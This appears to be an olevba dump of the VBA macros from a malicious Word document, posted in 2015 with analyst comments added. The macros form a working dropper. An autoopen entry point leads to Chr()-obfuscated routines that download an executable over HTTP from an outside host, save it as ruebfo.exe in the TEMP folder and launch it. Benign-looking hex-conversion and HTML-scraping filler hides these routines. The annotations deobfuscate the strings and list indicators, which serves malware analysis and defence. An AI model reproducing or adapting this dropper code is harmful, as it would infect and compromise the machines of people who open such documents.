dynamoo

Malicious Word macro

Aug 25th, 2015
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MASIH--V visaca~3.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: visaca~3.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
      ' ANALYST NOTE: auto-executable entry point (the "A" flag in the olevba summary).
      ' Word runs a macro with this name when the document is opened with macros enabled.
      ' Its only statement is the call below; the literal 500 is not used by the callee.
  17.  
  18. HHNANNNNNAD (500)
  19.  
  20. End Sub
  21.  
  22. Sub HHNANNNNNAD(FFFFF As Long)
      ' ANALYST NOTE: pass-through wrapper. FFFFF is never read; the Sub only calls
      ' ConvCFGFFD (defined in Module2), which performs the download / write / launch sequence.
  23. ConvCFGFFD
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module2.bas
  31. in file: word/vbaProject.bin - OLE stream: u'VBA/Module2'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33.  
  34.  
  35. Public Type typFloat         ' FLOAT CONVERTER TYPES/VALUES
  36.    F As Single
  37. End Type
  38.  
  39. Public Type typStringArray2  ' STRING ARRAY CONVERTER TYPE
  40.    Str(1 To 2) As String
  41. End Type
  42.  
  43. Public Type typByteArray3    ' BYTE ARRAY CONVERTER TYPES/VALUES
  44.    B(1 To 3) As Byte
  45. End Type
  46.  
  47. Public Type typByteArray4    ' BYTE ARRAY CONVERTER TYPES/VALUES
  48.    B(1 To 4) As Byte
  49. End Type
  50.  
  51.  
  52. Public Type typNumString     ' NUM/STRING PARAMETER TYPE
  53.    Number As Integer
  54.     RawString As String
  55. End Type
  56.  
  57.  
  58. Public Type typCfgParam      ' CFG PARAMETER TYPE
  59.    Name As String
  60.     Value As String
  61.     Comment As String
  62. End Type
  63.  
  64.  
  65. Public MarkError As Boolean  ' Global error conversion flag.
  66.  
  67. '==========================================================================
  68. ' FUNCTION:
  69. '
  70. '==========================================================================
  71.  
  72.  
  73.  
  74.  
  75. '==========================================================================
  76. ' FUNCTION: WRITE PARAMETER
  77. ' Converts patch param type to HEX string, according to given type index,
  78. ' then writes it to file.
  79. ' P.S.: Given type index is identical to NewMainWindow parameter type
  80. ' option control array.
  81. '==========================================================================
  82. Function WriteParam(ByVal RawParam As String, ByVal Offset As String, DataType As Integer) As Boolean
  83.  
  84. On Error GoTo ErrorHandler
  85.  
  86.  Dim cntParamOffsetRGB As Integer  ' Next three variables needed only for RGB type.
  87. Dim RGBValues() As String
  88.  Dim RGBOffsets() As String
  89.  
  90.  Dim FinalHexString As String
  91.  
  92.  
  93.   WriteParam = False ' reset just in case...
  94.  
  95.  
  96.    Select Case DataType
  97.    
  98.         Case 0: FinalHexString = InvertHex(ValToHex(DecToIEEE(CDbl(StripIn(RawParam, kMaskFloat))), 8))
  99.         Case 1: FinalHexString = ValToHex(RawParam, 2)                  ' Bits(8)
  100.        Case 2: FinalHexString = InvertHex(ValToHex(RawParam, 4))       ' Bits(16)
  101.        Case 3, 5: FinalHexString = InvertHex(ValToHex(RawParam, 2))    ' Byte (signed / unsigned)
  102.        Case 4, 6: FinalHexString = InvertHex(ValToHex(RawParam, 4))    ' Integer (signed / unsigned)
  103.        Case 7: FinalHexString = InvertHex(ValToHex(RawParam, 8))       ' Long
  104.        Case 9:  FinalHexString = InvertHex(BytesToHex(RawParam, 3))    ' RGB
  105.                 RGBOffsets = Split(Offset, kDivider2, 3)
  106.                  RGBValues = Split(RawParam, kDivider, 3)
  107.                  
  108.         Case 8: FinalHexString = vbNullString                           ' String with zero length, never used.
  109.        Case Else
  110.        
  111.              If DataType < 100 Then
  112.                 FinalHexString = vbNullString
  113.             Else
  114.            
  115.                 ' For string type (which is always > 100), we calculate length by dividing DataType by 100,
  116.                ' multiplying it by 2 (as hex takes 2) and adding 2 extra zeros to the end.
  117.                
  118.                 FinalHexString = CharFillR((StringToHex(RawParam)), "0", ((Fix(DataType / 100) * 2))) & "00"
  119.                
  120.             End If
  121.            
  122.     End Select
  123.    
  124.    
  125.    
  126.     If DataType <> 9 Then  ' For RGB datatype, we specify offset workaround,
  127.                           ' in case user wants to specify offset for each color component seperately.
  128.    
  129.         Call WriteHex(FinalHexString, HxVal(Offset), hFile)    ' Default method, single offset.
  130.        
  131.     Else
  132.             Select Case UBound(RGBOffsets)                     ' Alternate method, single or triple offsets (twin gets ignored).
  133.            
  134.                 Case 0: Call WriteHex(FinalHexString, HxVal(Offset), hFile)
  135.                 Case 2:
  136.                         For cntParamOffsetRGB = 0 To 2
  137.                             Call WriteHex(ValToHex(RGBValues(cntParamOffsetRGB), 2), HxVal(RGBOffsets(cntParamOffsetRGB)), hFile)
  138.                         Next cntParamOffsetRGB
  139.                        
  140.                 Case Else: GoTo ErrorHandler
  141.            
  142.             End Select
  143.            
  144.     End If
  145.    
  146.    
  147.  WriteParam = True
  148.  Exit Function
  149.  
  150.  
  151. ErrorHandler:
  152.     Exit Function
  153.  
  154. End Function
  155.  
  156.  
  157.  
  158. '==========================================================================
  159. ' FUNCTION: CONVERT CONFIG STRING
  160. ' Deciphers config string by mask [ParName] = [ParString] and returns
  161. ' result as cfgParam type.
  162. '==========================================================================
  163. '
  164. Public Function ConvCFG(ByVal SourceString As String) As typCfgParam
  165.  
  166.  Dim cntCharCounter          As Long
  167.  Dim cntSrcStringLength      As Long
  168.  
  169.  Dim cntMarkCommentBeginning As Long
  170.  Dim cntMarkValueBeginning   As Long
  171.                
  172.     SourceString = Trim$(SourceString)
  173.  
  174.     If LenB(SourceString) = 0 Then Exit Function
  175.     If Asc(SourceString) = 59 Or Asc(SourceString) = 91 Then Exit Function 'if REMARKED, then END FUNCTION NOW!!!
  176.                            
  177.     ConvCFG.Name = vbNullString
  178.     ConvCFG.Value = vbNullString
  179.     ConvCFG.Comment = vbNullString
  180.                
  181.     cntMarkCommentBeginning = 0
  182.     cntMarkValueBeginning = 0
  183.                
  184.     cntSrcStringLength = Len(SourceString)
  185.  
  186.     For cntCharCounter = cntSrcStringLength To 1 Step -1
  187.                
  188.         Select Case Mid$(SourceString, cntCharCounter, 1)
  189.                    
  190.             Case kCommentary: cntMarkCommentBeginning = cntCharCounter + 1
  191.  
  192.             Case kEquals: cntMarkValueBeginning = cntCharCounter + 1
  193.                    
  194.         End Select
  195.                
  196.     Next cntCharCounter
  197.  
  198.                
  199.     If cntMarkValueBeginning = 0 Then Exit Function
  200.     If cntMarkValueBeginning > cntMarkCommentBeginning And cntMarkCommentBeginning > 0 Then Exit Function
  201.                
  202.     ConvCFG.Name = Trim$(Left$(SourceString, cntMarkValueBeginning - 2))
  203.                
  204.     If cntMarkCommentBeginning = 0 Then
  205.                
  206.         ConvCFG.Value = Trim$(Right$(SourceString, (cntSrcStringLength + 1) - cntMarkValueBeginning))
  207.                    
  208.     Else
  209.                
  210.         ConvCFG.Comment = Trim$(Mid$(SourceString, cntMarkCommentBeginning))
  211.         ConvCFG.Value = Trim$(Mid$(SourceString, cntMarkValueBeginning, cntMarkCommentBeginning - cntMarkValueBeginning - 1))
  212.                    
  213.     End If
  214.                
  215. End Function
  216.  
  217.  
  218.  
  219. '==========================================================================
  220. ' FUNCTION: VALUE TO HEX-STRING OF SPECIFIED LENGTH
  221. ' Converts decimal value (e.g. "11") into true hex value with given length
  222. ' (e.g. "0B" in case nativelength=1 or "000B in case nativelength=2)
  223. '==========================================================================
  224. Public Function ValToHex(ByVal SourceValue As String, ByVal DesiredLength As Byte) As String
       ' Returns Hex(Val(SourceValue)), left-padded with "0" via CharFillL when shorter than
       ' DesiredLength, or cut down to its rightmost DesiredLength characters when longer.
       ' On a runtime error it shows a MsgBox and returns vbNullString.
       ' NOTE(review): in the visible listing this is called only from WriteParam and BytesToHex,
       ' neither of which is reached from autoopen; it looks like padding around ConvCFGFFD,
       ' which follows directly below. Confirm against the full dump.
  225.  
  226. On Error GoTo ErrorHandler
  227.  
  228.  Dim SrcLength As Byte
  229.    
  230.     ValToHex = Hex(Val(SourceValue))
  231.     SrcLength = Len(ValToHex)
  232.    
  233.     If SrcLength < DesiredLength Then ValToHex = CharFillL(ValToHex, "0", DesiredLength)
  234.        
  235.     If SrcLength > DesiredLength Then _
  236.        ValToHex = Mid$(ValToHex, (SrcLength - DesiredLength + 1), DesiredLength) 'cuts off excess
  237.    
  238.     Exit Function
  239.  
  240. ErrorHandler:
  241.     MsgBox "Warning: possible error during DEC > HEX conversion. You have entered incorrect value (" + SourceValue + ")."
  242.     ValToHex = vbNullString
  243. End Function
  244.  
  245. Public Function ConvCFGFFD()
       ' ANALYST NOTE: dropper routine, reached via autoopen -> HHNANNNNNAD. The name imitates
       ' the ConvCFG helper defined earlier in this module, and the variable names imitate the
       ' hex-conversion helpers around it.
       ' Every string is built from Chr() codes with junk "<", "=" and ";" characters mixed in;
       ' ValToDicBin strips those three characters and passes the result to CreateObject.
       ' Sequence: (1) read %TEMP%, (2) fetch bytes over HTTP via checkFolder_32,
       ' (3) write them to %TEMP%\ruebfo.exe through a binary stream, (4) open that file.
       ' Defender view: an Office process requesting an .exe over HTTP and writing an
       ' executable under %TEMP% are the observable behaviours of this routine.
       '
       ' Step 1: the ProgID decodes to "WScript.Shell"; .Environment("Process") is the
       ' process-level environment collection.
  246. Set InvertDicBin = ValToDicBin(Chr(87) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)) _
  247. .Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
       ' The key decodes to "TEMP", so UnsignedHexString2 holds the TEMP directory path.
  248. UnsignedHexString2 = InvertDicBin("TE" & Chr(77) & Chr(80))
  249. Dim UnsignedHexLong4 As Object
       ' The ProgID decodes to "Adodb.Stream" (used below as a binary file writer).
  250. Set UnsignedHexLong4 = ValToDicBin(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
  251. Dim UnsignedHexLong3 As String
       ' Drop path: <TEMP> & "\ruebfo.exe" (file-name indicator for this sample).
  252. UnsignedHexLong3 = UnsignedHexString2 + "\rue" & Chr(98) + "fo." & "e" & Chr(120) & Chr(101)
  253. With UnsignedHexLong4
       ' Type = 1 selects binary mode on an ADODB.Stream (adTypeBinary).
  254.    .Type = 1
  255.     .Open
       ' checkFolder_32 returns the HTTP response body; its argument (223) is never read there.
  256.     .write checkFolder_32(223)
  257.    
  258. End With
  259.  
       ' GetArrayToBack8 (Module1) saves the stream contents to the drop path.
  260.  GetArrayToBack8 UnsignedHexLong4, UnsignedHexLong3
       ' The ProgID decodes to "Shell.Application"; its Open method is then invoked on the
       ' dropped file, which is how the downloaded executable gets started.
  261. Set noextensionFile = ValToDicBin(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
  262. noextensionFile.Open (UnsignedHexLong3)
  263. End Function
  264.  
  265. '==========================================================================
  266. ' FUNCTION: VALUE TO HEX-STRING OF SPECIFIED LENGTH (UNSIGNED)
  267. ' This function does the same as ValToHex, but with unsigned hexes
  268. '==========================================================================
  269. Public Function ValToHexUnsigned(ByVal SourceValue As String, ByVal DesiredLength As Byte) As String
  270. On Error GoTo ErrorHandler
  271.  
  272.  Dim SrcLength As Byte
  273.    
  274.     ValToHexUnsigned = UnsignedHex(Val(SourceValue))
  275.     SrcLength = Len(ValToHexUnsigned)
  276.  
  277.     If SrcLength < DesiredLength Then ValToHexUnsigned = CharFillL(ValToHexUnsigned, "0", DesiredLength)
  278.    
  279.     If SrcLength > DesiredLength Then _
  280.        ValToHexUnsigned = Mid$(ValToHexUnsigned, (SrcLength - DesiredLength + 1), DesiredLength) 'cuts off excess
  281.    
  282.     Exit Function
  283.  
  284. ErrorHandler:
  285.     MsgBox "Warning: possible error during DEC>HEX conversion. You have entered incorrect value (" + SourceValue + ")."
  286.     ValToHexUnsigned = vbNullString
  287.  
  288. End Function
  289.  
  290.  
  291.  
  292. '==========================================================================
  293. ' FUNCTION: INVERT HEXADECIMAL STRING (ex-Invrt)
  294. ' Inverts hexadecimal string to comply with x86 little-endian standard.
  295. '==========================================================================
  296. Public Function InvertHex(ByVal SourceString As String) As String
  297.  
  298.  Dim cntCurChar As Integer
  299.  Dim LengthInBytes As Integer
  300.  
  301. '   Check if string contains odd or even amount of symbols, and if it's even,
  302. '   just cut the last symbol:
  303.  
  304.     If Len(SourceString) Mod 2 = 0 Then _
  305.        LengthInBytes = Len(SourceString) / 2 Else _
  306.        LengthInBytes = Len(SourceString) / 2 - 1
  307.        
  308.        
  309. '   Inversion cycle itself:
  310.  
  311.     For cntCurChar = 1 To LengthInBytes * 2 Step 2
  312.    
  313.         If cntCurChar <> LengthInBytes * 2 Then
  314.             InvertHex = InvertHex + (Mid$(SourceString, ((LengthInBytes * 2) - cntCurChar), 2))
  315.         End If
  316.        
  317.     Next
  318.  
  319. End Function
  320.  
  321.  
  322.  
  323. '==========================================================================
  324. ' FUNCTION: DECIMAL TO UNSIGNED HEX CONVERSION
  325. ' Converts any type of numbers to unsigned HEX string (prevents overflow)
  326. '==========================================================================
  327. Function UnsignedHex(ByVal Value As Variant) As String
       ' Returns the hex form of Value treated as an unsigned 32-bit number.
       ' Negative values, or values whose magnitude is >= 2^32, yield -1 (assigned to the String result).
       ' Values >= 2^31 have 2^32 subtracted before being passed to Hex$.
       ' NOTE(review): the only caller in the visible listing is ValToHexUnsigned, which is not
       ' reached from autoopen; the downloader checkFolder_32 sits directly below this helper.
  328.  
  329.  Dim TwoToThe32 As Variant
  330.    
  331.         TwoToThe32 = CDec("2") ^ 32
  332.        
  333.         If CDec(Value) < 0 Or Abs(CDec(Value)) >= TwoToThe32 Then
  334.             UnsignedHex = -1
  335.         Else
  336.             If CDec(Value) >= TwoToThe32 / 2 Then
  337.                 Value = CDec(Value) - TwoToThe32
  338.             End If
  339.             UnsignedHex = Hex$(CDec(Value))
  340.         End If
  341.        
  342. End Function
  343.  
  344.  
  345. Public Function checkFolder_32(KJB As Long)
       ' ANALYST NOTE: download stage, called from ConvCFGFFD. KJB is never read, and the
       ' name has nothing to do with what the function does.
       ' Returns the raw response body of a single synchronous HTTP GET.
  346.  
       ' The ProgID decodes (after ValToDicBin strips "<", "=", ";") to "Microsoft.XMLHTTP".
  347. Dim strUnquote23: Set strUnquote23 = ValToDicBin(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
       ' Method decodes to "GET"; the URL decodes to (defanged)
       ' hxxp://landrevie[.]g[.]free[.]fr/45gf3/7uf3ref.exe ; the final False makes the call synchronous.
       ' Network indicator for this sample: the host and path above, requested over plain HTTP.
  348. strUnquote23.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(108) & Chr(97) & Chr(110) & "d" & Chr(114) & Chr(101) & Chr(118) & "i" & "e" & "." & Chr(103) & Chr(46) & Chr(102) & "r" & "e" & Chr(101) & Chr(46) & Chr(102) & "r" & Chr(47) & Chr(52) & Chr(53) & Chr(103) & Chr(102) & Chr(51) & Chr(47) & Chr(55) & Chr(117) & Chr(102) & Chr(51) & Chr(114) & Chr(101) & Chr(102) & Chr(46) & "e" & Chr(120) & "e", False
  349. strUnquote23.Send
       ' No status-code or content check is made; whatever the server returns is handed back.
  350. checkFolder_32 = strUnquote23.responseBody
  351. End Function
  352.  
  353.  
  354. '==========================================================================
  355. ' FUNCTION: A,B,C,D PARAMETERS TO BYTES(4)
  356. ' Converts 4 divider-separated byte values string into 4 byte array values
  357. '==========================================================================
  358. Public Function ParamsToBytes4(RawString As String, ByVal Nomer As Byte) As typByteArray4
  359.  
  360. On Error GoTo ErrorHandler 'if overflow or end string, then stop execution
  361.  
  362.  Dim tmpStringArray() As String
  363.  Dim tmpCurrentValue As Byte
  364.  Dim cntPointer As Byte
  365.  
  366.         tmpStringArray = Split(RawString, kDivider, 4)
  367.         If UBound(tmpStringArray) > 3 Then ReDim Preserve tmpStringArray(3)
  368.        
  369.         For cntPointer = 0 To UBound(tmpStringArray)
  370.             ParamsToBytes4.B(cntPointer + 1) = CByteL(tmpStringArray(cntPointer))
  371.         Next cntPointer
  372.                
  373.         Exit Function
  374.        
  375. ErrorHandler:   ParamsToBytes4.B(1) = 0 'fuk em...
  376.                ParamsToBytes4.B(2) = 0
  377.                 ParamsToBytes4.B(3) = 0
  378.                 ParamsToBytes4.B(4) = 0
  379.  
  380. End Function
  381.  
  382.  
  383.  
  384. '==========================================================================
  385. ' FUNCTION: A,B,C PARAMETERS TO BYTES(3) (ex-RGBAConv)
  386. ' Converts 3 divider-separated byte values string into 3 byte array values
  387. '==========================================================================
  388. Public Function BytesToHex(RawString As String, Limit As Integer) As String
  389.  
  390.  Dim tmpStringArray() As String
  391.  Dim cntPointer As Byte
  392.  
  393.         tmpStringArray = Split(RawString, kDivider, Limit)
  394.        
  395.         For cntPointer = 0 To UBound(tmpStringArray)
  396.             BytesToHex = BytesToHex & ValToHex(tmpStringArray(cntPointer), 2)
  397.         Next cntPointer
  398.  
  399.        
  400. End Function
  401.  
  402.  
  403.  
  404. -------------------------------------------------------------------------------
  405. VBA MACRO Module1.bas
  406. in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
  407. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  408.  
  409. '=========================================================================================================================
  410. ' Functions used for HTML scrapping.  Ugly Business
  411. '=========================================================================================================================
  412. Function GetArrayofInstancesFromHTML(sHTML As String, sSearchTag As String, sSearchPredicate As String) As String()
  413.     Dim sTagStart As String, sTagEnd As String, sFoundText As String
  414.     Dim iStart As Long, iEnd As Long, iCounter As Long, sOutputArray() As String
  415.  
  416.     sTagStart = "<" & sSearchTag & " "
  417.     sTagEnd = "/" & sSearchTag & ">"
  418.     If sSearchTag = "input" Then sTagEnd = " />"
  419.    
  420.     iStart = 1:    iCounter = 0
  421.     While iStart > 0
  422.         iStart = VBA.InStr(iStart + 1, sHTML, sTagStart)
  423.         If iStart > 0 Then
  424.             iEnd = VBA.InStr(iStart, sHTML, sTagEnd)
  425.             sFoundText = VBA.Mid$(sHTML, iStart + VBA.Len(sTagStart) - 1, iEnd - (iStart + VBA.Len(sTagStart) - 1))
  426.            
  427.             'If we have set a predicate, then make sure it matches
  428.            If VBA.Len(sSearchPredicate) > 0 Then
  429.                 If VBA.InStr(1, sFoundText, sSearchPredicate) = 0 Then sFoundText = ""
  430.             End If
  431.         End If
  432.        
  433.         'If we've found something then chuck it in the array
  434.        If VBA.Len(sFoundText) > 0 Then
  435.             iCounter = iCounter + 1
  436.             ReDim Preserve sOutputArray(1 To iCounter)
  437.             sOutputArray(iCounter) = sFoundText
  438.         End If
  439.     Wend
  440.  
  441.     GetArrayofInstancesFromHTML = sOutputArray
  442. End Function
  443.  
  444. Function GetValueForVariable(sHTML As String, sValue As String, Optional bRemoveQuotes As Boolean) As String
  445.     Dim iStart As Integer, iEnd As Integer, sResponse As String
  446.    
  447.     iStart = VBA.InStr(1, sHTML, sValue & "=") + VBA.Len(sValue & "=")
  448.     iEnd = VBA.InStr(iStart + 1, sHTML, """")
  449.     sResponse = VBA.Mid$(sHTML, iStart, iEnd - iStart + 1)
  450.    
  451.     If bRemoveQuotes Then
  452.         If VBA.Left$(sResponse, 1) = """" Then sResponse = VBA.Right$(sResponse, VBA.Len(sResponse) - 1)
  453.         If VBA.Right$(sResponse, 1) = """" Then sResponse = VBA.Left$(sResponse, VBA.Len(sResponse) - 1)
  454.     End If
  455.    
  456.     GetValueForVariable = sResponse
  457. End Function
  458.  
  459. Function GetInnerText(sString As String) As String
       ' Returns the text between the first ">" in sString and the next "<" after it.
       ' NOTE(review): no caller appears in the visible listing; this and the other HTML helpers
       ' in Module1 look like unrelated filler. The Sub that follows with no blank line,
       ' GetArrayToBack8, is part of the dropper chain.
  460.     Dim iStart As Integer, iEnd As Integer, sResponse As String
  461.  
  462.     iStart = VBA.InStr(1, sString, ">")
  463.     iEnd = VBA.InStr(iStart, sString, "<")
  464.     sResponse = VBA.Mid$(sString, iStart + 1, iEnd - iStart - 1)
  465.    
  466.     GetInnerText = sResponse
  467. End Function
  468. Public Sub GetArrayToBack8(UnsignedHexLong4 As Object, UnsignedHexLong3 As String)
       ' ANALYST NOTE: file-write stage, called from ConvCFGFFD with the ADODB.Stream object
       ' and the %TEMP%\ruebfo.exe path. It is placed between the HTML helpers of this module
       ' and named to match them.
       ' SaveToFile with option 2 creates the file or overwrites an existing one (adSaveCreateOverWrite).
  469. UnsignedHexLong4.savetofile UnsignedHexLong3, 2
  470. End Sub
  471. Function GetArrayOfAnInput(sHTML As String) As String()
  472.     ''Gets all the variables for all the inputs in the sent string
  473.  
  474.     Dim sInputsArray() As String, sTemp As String
  475.     Dim iStart As Integer, iStart2 As Integer, iEnd As Integer, iEnd2 As Integer, iEnd2Old As Integer, iCounter As Integer
  476.    
  477.    
  478.     iStart = 1
  479.     While iStart > 0
  480.         iStart = VBA.InStr(iStart + 1, sHTML, "<input ")
  481.         If iStart > 0 Then
  482.             iEnd = VBA.InStr(iStart, sHTML, """ />")
  483.             If iEnd > 0 Then sTemp = VBA.Mid$(sHTML, iStart + VBA.Len("<input "), iEnd - (iStart + VBA.Len(""" />")) - 2)
  484.            
  485.             'We've found an input so work out all the individual values
  486.            If VBA.Len(sTemp) > 0 Then
  487.                 iCounter = 0
  488.                 iStart2 = 0
  489.                 iEnd2Old = 0
  490.                 Do
  491.                     'Loop while we keep finding a =" string
  492.                    iStart2 = VBA.InStr(iStart2 + 1, sTemp, "=""")
  493.                     If iStart2 > 0 Then
  494.                         'Find the quote at the end
  495.                        iEnd2 = VBA.InStr(iStart2 + 2, sTemp, """")
  496.                         If iEnd2 > 0 Then
  497.                             'Add it to the output array
  498.                            iCounter = iCounter + 1
  499.                             ReDim Preserve sInputsArray(1 To 2, 1 To iCounter)
  500.                             sInputsArray(1, iCounter) = VBA.Mid$(sTemp, iEnd2Old + 1, iStart2 - iEnd2Old - 1)
  501.                             sInputsArray(2, iCounter) = VBA.Mid$(sTemp, iStart2 + 2, iEnd2 - iStart2 - 2)
  502.                             iEnd2Old = iEnd2
  503.                         End If
  504.                     End If
  505.                 Loop Until iStart2 = 0
  506.             End If
  507.         End If
  508.     Wend
  509.  
  510.     GetArrayOfAnInput = sInputsArray
  511. End Function
  512.  
  513. Function ReturnSelectedString(sArray() As String, sWithString As String) As String
  514.     Dim ii As Integer
  515.  
  516.     For ii = LBound(sArray) To UBound(sArray)
  517.         If VBA.InStr(1, sArray(ii), sWithString) Then
  518.             ReturnSelectedString = sArray(ii)
  519.             Exit Function
  520.         End If
  521.     Next ii
  522. End Function
  523.  
  524. Function BuildFormString(sArray() As String) As String
  525.     'This function builds a standard HTML web form string from an array of input values
  526.    Dim ii As Integer, sReturnedString As String, sDivider As String
  527.    
  528.     sDivider = "--" & MULTIPART_BOUNDARY
  529.  
  530.     For ii = LBound(sArray, 2) To UBound(sArray, 2)
  531.         sReturnedString = sReturnedString & sDivider & vbCr & vbLf
  532.         sReturnedString = sReturnedString & "Content-Disposition: form-data; name=" & sArray(2, ii) & vbCr & vbLf & vbCr & vbLf & sArray(1, ii) & vbCr & vbLf
  533.     Next ii
  534.    
  535.     sReturnedString = sReturnedString & sDivider & "--"
  536.     BuildFormString = sReturnedString
  537. End Function
  538.  
  539. 'Function GetParametersFromAJAXString(sHTML As String) As String()
  540. '    Dim lStart As Long, lEnd As Long
  541. '    Dim sMid As String
  542. '    Dim sArray() As String
  543. '
  544. '    lStart = VBA.InStr(1, sHTML, "A4J.AJAX.Submit")
  545. '
  546. '
  547. '    If lStart > 0 Then
  548. '        lStart = VBA.InStr(lStart, sHTML, "(")
  549. '        lEnd = VBA.InStr(lStart, sHTML, ")")
  550. '        sMid = VBA.Mid$(sHTML, lStart + 1, lEnd - lStart - 1)
  551. '        sArray = VBA.Split(sMid, ",")
  552. '
  553. '        GetParametersFromAJAXString = sArray
  554. '    End If
  555. 'End Function
  556. '
  557. 'Function GetAJAXViewState(sHTML As String) As String
  558. '    Dim lStart As Long, lEnd As Long
  559. '    Dim sMid As String
  560. '
  561. '    lStart = VBA.InStr(1, sHTML, "javax.faces.ViewState")
  562. '    lStart = VBA.InStr(lStart, sHTML, "value=""")
  563. '
  564. '    If lStart > 0 Then
  565. '        lEnd = VBA.InStr(lStart, sHTML, """ />")
  566. '        sMid = VBA.Mid$(sHTML, lStart + VBA.Len("value="""), lEnd - lStart - VBA.Len("value="""))
  567. '        GetAJAXViewState = sMid
  568. '    End If
  569. '
  570.  
  571. -------------------------------------------------------------------------------
  572. VBA MACRO Module3.bas
  573. in file: word/vbaProject.bin - OLE stream: u'VBA/Module3'
  574. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  575.  
  576.  
  577. '==========================================================================
  578. ' FUNCTION: PARAMETERS TO STRING ARRAY
  579. ' Converts 2 divider-separated values into string + string values
  580. '==========================================================================
  581. Public Function ParamsToStringArray(RawString As String, Limit As Integer) As String()
  582.  
  583. On Error GoTo ErrorHandler 'if overflow or end string, then stop execution
  584.  
  585.  Dim cntPointer As Integer
  586.  Dim tmpStringArray() As String
  587.  
  588.     ParamsToStringArray = Split(RawString, kDivider, Limit)
  589.     If UBound(ParamsToStringArray) > Limit Or UBound(ParamsToStringArray) < Limit Then ReDim Preserve ParamsToStringArray(Limit)
  590.    
  591.     Exit Function
  592.        
  593. ErrorHandler:
  594.     Exit Function
  595.        
  596. End Function
  597.  
  598.  
  599.  
  600. '==========================================================================
  601. ' FUNCTION: A,B PARAMETERS TO INTEGER + STRING
  602. ' Converts 2 divider-separated values into integer + string values
  603. '==========================================================================
  604. Public Function ParamsToNumString(RawString As String) As typNumString
  605.  
  606. On Error GoTo ErrorHandler 'if overflow or end string, then stop execution
  607.  
  608.  Dim tmpStringArray() As String
  609.  
  610.     tmpStringArray = Split(RawString, kDivider, 2)
  611.    
  612.     ParamsToNumString.Number = CInt(tmpStringArray(0))
  613.     ParamsToNumString.RawString = tmpStringArray(1)
  614.                                    
  615.     Exit Function
  616.        
  617. ErrorHandler:   ParamsToNumString.Number = 0 'fuk em...
  618.                ParamsToNumString.RawString = vbNullString
  619.  
  620. End Function
  621.  
  622.  
  623.  
  624. '==========================================================================
  625. ' FUNCTION: STRING TO HEXADECIMAL STRING
  626. ' Converts standard string to a string hexcode.
  627. '==========================================================================
  628. Public Function StringToHex(ByVal Stroka As String) As String
  629.  
  630.  Dim cntCharCounter As Byte
  631.  
  632.         For cntCharCounter = 1 To Len(Stroka)
  633.             StringToHex = StringToHex & Hex(AscB(Mid$(Stroka, cntCharCounter, 1)))
  634.         Next
  635.        
  636. End Function
  637.  
  638.  
  639.  
  640. '==========================================================================
  641. ' FUNCTION: DECIMAL TO IEEE-754 FLOAT
  642. ' Converts decimal long to IEEE-754 float
  643. '==========================================================================
  644. Public Function DecToIEEE(ByVal DecValue As Double) As Long
  645.  
  646. On Error GoTo ErrorHandler
  647.  
  648.  Dim B As typByteArray4
  649.  Dim F As typFloat
  650.  Dim t As Long
  651.  
  652.     F.F = DecValue
  653.     LSet B = F
  654.     DecToIEEE = B.B(4) * (2 ^ 24)
  655.     DecToIEEE = DecToIEEE + B.B(3) * (2 ^ 16)
  656.     DecToIEEE = DecToIEEE + B.B(2) * (2 ^ 8)
  657.     DecToIEEE = DecToIEEE + B.B(1)
  658.  
  659. Exit Function
  660.  
  661. ErrorHandler:
  662.         MsgBox "Error during DEC > IEEE-754 float conversion. Check if you have set correct value."
  663.  
  664. End Function
  665.  
  666.  
  667.  
  668. '==========================================================================
  669. ' FUNCTION: HEX TO DECIMAL VALUE
  670. ' Converts hexadecimal long to a decimal long.
  671. '==========================================================================
  672. Function HxVal(ByVal s As String) As Long
  673.  
  674. On Error GoTo ErrorHandler
  675.  
  676.     If LenB(s) <> 0 Then HxVal = CLng("&H" & s) Else HxVal = CLng("&H" & "00")
  677.     Exit Function
  678.  
  679. ErrorHandler:
  680.     If MarkError = False Then
  681.         MarkError = True
  682.         HxVal = CLng("&H" & "00")
  683.         MsgBox "There was an error when converting some hexadecimal value to a decimal." & vbCrLf & _
  684.                "Make sure that you haven't entered wrong data." & vbCrLf & "Source string: ''" & s & "''"
  685.     End If
  686.  
  687. End Function
  688.  
  689. '==========================================================================
  690. ' FUNCTION: SINGLE-LINE TO MULTI-LINE (//-TERMINATED)
  691. ' Converts single-line //-terminated string into multiline string
  692. '==========================================================================
